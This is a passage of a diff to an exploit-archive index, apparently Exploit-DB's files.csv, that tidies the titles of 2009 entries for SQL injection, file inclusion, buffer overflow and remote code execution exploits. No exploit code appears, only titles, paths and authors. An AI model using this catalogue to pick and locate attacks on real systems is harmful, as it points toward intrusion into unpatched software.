Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 - (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 -8456,platforms/multiple/local/8456.txt,"Oracle APEX 3.2 - Unprivileged DB users can see APEX password hashes",2009-04-16,"Alexander Kornbrust",multiple,local,0 +8456,platforms/multiple/local/8456.txt,"Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes",2009-04-16,"Alexander Kornbrust",multiple,local,0 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0 8458,platforms/multiple/remote/8458.txt,"Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,multiple,remote,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue - Local Heap Overflow (PoC)",2009-04-16,Stack,windows,dos,0 -8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 +8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service",2009-04-17,"Code Audit Labs",windows,dos,0 -8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - .png Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0 +8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 -8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Pre-Authenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0 +8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - '.torrent' Buffer Overflow",2009-04-17,"Michael Brooks",linux,local,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 -8475,platforms/php/webapps/8475.txt,"Online GuestBook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 +8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Authentication Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1)",2009-04-20,kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 -8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 +8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - (File Upload / Information Disclosure) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0 @@ -7997,20 +7998,20 @@ id,file,description,date,author,platform,type,port 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0 -8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Post-Authenticated Remote Denial of Service",2009-04-20,h00die,hardware,dos,0 +8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service",2009-04-20,h00die,hardware,dos,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 -8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 - (Authentication Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0 +8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0 8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service",2009-04-21,shinnai,windows,dos,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0 -8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - (include) Local File Inclusion",2009-04-21,SirGod,php,webapps,0 +8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps,0 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0 8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0 @@ -8020,8 +8021,8 @@ id,file,description,date,author,platform,type,port 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server 5.0 - Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 -8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 -8514,platforms/php/webapps/8514.txt,"elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0 +8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0 +8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0 8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials - Cross-Site Scripting Exploit",2009-04-22,jdc,php,webapps,0 @@ -8031,12 +8032,12 @@ id,file,description,date,author,platform,type,port 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos,0 -8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 - (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 +8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos,0 8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow",2009-04-23,Stack,windows,local,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0 -8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Pasword Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0 +8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Password Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0 8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)",2009-04-24,Cyber-Zone,windows,dos,0 8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injections",2009-04-24,"Salvatore Fresta",php,webapps,0 @@ -8049,9 +8050,9 @@ id,file,description,date,author,platform,type,port 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0 8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,windows,local,0 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 - Base64FileEncode() Buffer Overflow (PoC)",2009-04-27,Nine:Situations:Group,windows,dos,0 -8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 +8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - (register.php) Remote Code Execution",2009-04-27,EgiX,php,webapps,0 8544,platforms/linux/dos/8544.pl,"iodined 0.4.2-2 - (forged DNS packet) Denial of Service",2009-04-27,"Albert Sellares",linux,dos,0 -8545,platforms/php/webapps/8545.txt,"dew-newphplinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 +8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php ln' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 @@ -8066,7 +8067,7 @@ id,file,description,date,author,platform,type,port 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure Exploit (C)",2009-04-28,StAkeR,php,webapps,0 -8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 +8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 @@ -8075,8 +8076,8 @@ id,file,description,date,author,platform,type,port 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - '.yuv' Local Stack Overflow (PoC)",2009-04-29,GoLd_M,windows,dos,0 -8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 -8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 +8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution",2009-04-29,Arr1val,linux,remote,0 +8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution",2009-04-29,Arr1val,linux,remote,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Privilege Escalation (2)",2009-04-30,"Jon Oberheide",linux,local,0 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 @@ -8100,23 +8101,23 @@ id,file,description,date,author,platform,type,port 8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 8594,platforms/windows/local/8594.pl,"RM Downloader - '.smi' Universal Local Buffer Overflow",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 -8596,platforms/asp/webapps/8596.pl,"Winn ASP GuestBook 1.01b - Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 +8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 8600,platforms/php/webapps/8600.txt,"BluSky CMS - (news_id) SQL Injection",2009-05-04,snakespc,php,webapps,0 8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0 -8602,platforms/php/webapps/8602.txt,"Qt quickteam - Multiple Remote File Inclusion",2009-05-04,ahmadbady,php,webapps,0 +8602,platforms/php/webapps/8602.txt,"Qt QuickTeam - Multiple Remote File Inclusion",2009-05-04,ahmadbady,php,webapps,0 8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution Exploit",2009-05-04,G4N0K,php,webapps,0 8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps,0 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Authentication Bypass",2009-05-04,"ThE g0bL!N",php,webapps,0 8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos,0 -8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - (.BMX) Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0 +8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0 8608,platforms/php/webapps/8608.txt,"projectcms 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 -8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 +8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (Guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,asp,webapps,0 8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - Banner Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",windows,dos,0 -8612,platforms/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - (.nzb) Local Buffer Overflow (SEH)",2009-05-05,"Gaurav Baruah",windows,local,0 +8612,platforms/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - '.nzb' Local Buffer Overflow (SEH)",2009-05-05,"Gaurav Baruah",windows,local,0 8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - (CWD response) Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - (Banner) Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 8615,platforms/php/webapps/8615.txt,"tematres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 @@ -8148,27 +8149,27 @@ id,file,description,date,author,platform,type,port 8641,platforms/multiple/local/8641.txt,"PHP - mb_ereg(i)_replace() Evaluate Replacement String",2009-05-07,80vul,multiple,local,0 8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0 8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0 -8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 - (.vpl) Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0 +8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0 8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0 8646,platforms/multiple/dos/8646.php,"Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet - Denial of Service",2009-05-08,ikki,multiple,dos,0 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 -8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - (AlbumID) Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0 -8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution Exploit",2009-05-08,EgiX,php,webapps,0 +8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0 +8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0 8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure Exploit",2009-05-11,Cyber-Zone,windows,remote,0 -8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Transversal Exploit",2009-05-11,StAkeR,php,webapps,0 +8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal Exploit",2009-05-11,StAkeR,php,webapps,0 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / File Upload",2009-05-11,ahmadbady,php,webapps,0 -8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Transversal",2009-05-11,StAkeR,php,webapps,0 +8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - '.mcp' Universal Seh Overwrite",2009-05-11,His0k4,windows,local,0 8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,windows,local,0 8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 -8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution Exploit",2009-05-12,Nine:Situations:Group,php,webapps,0 +8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0 8660,platforms/windows/local/8660.pl,"CastRipper 2.50.70 - '.m3u' Local Buffer Overflow",2009-05-12,[0]x80->[H]4x²0r,windows,local,0 8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,windows,local,0 8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",windows,local,0 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,windows,local,0 -8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - (username) SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 +8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - 'username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 @@ -8206,7 +8207,7 @@ id,file,description,date,author,platform,type,port 8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,php,webapps,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)",2009-05-15,His0k4,windows,local,0 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL Injection / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 -8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass (1)",2009-05-15,kingcope,windows,remote,0 +8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)",2009-05-15,kingcope,windows,remote,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - (mail.php ID) SQL Injection",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - (Authentication Bypass / Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 @@ -8226,7 +8227,7 @@ id,file,description,date,author,platform,type,port 8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - (Get Request) Remote Denial of Service",2009-05-18,Stack,windows,dos,0 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - 'id' SQL Injection",2009-05-18,Mi4night,php,webapps,0 -8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0 +8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,php,webapps,0 8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password Exploit",2009-05-18,ahmadbady,php,webapps,0 @@ -8253,18 +8254,18 @@ id,file,description,date,author,platform,type,port 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0 -8753,platforms/osx/remote/8753.txt,"Mac OSX - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 -8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 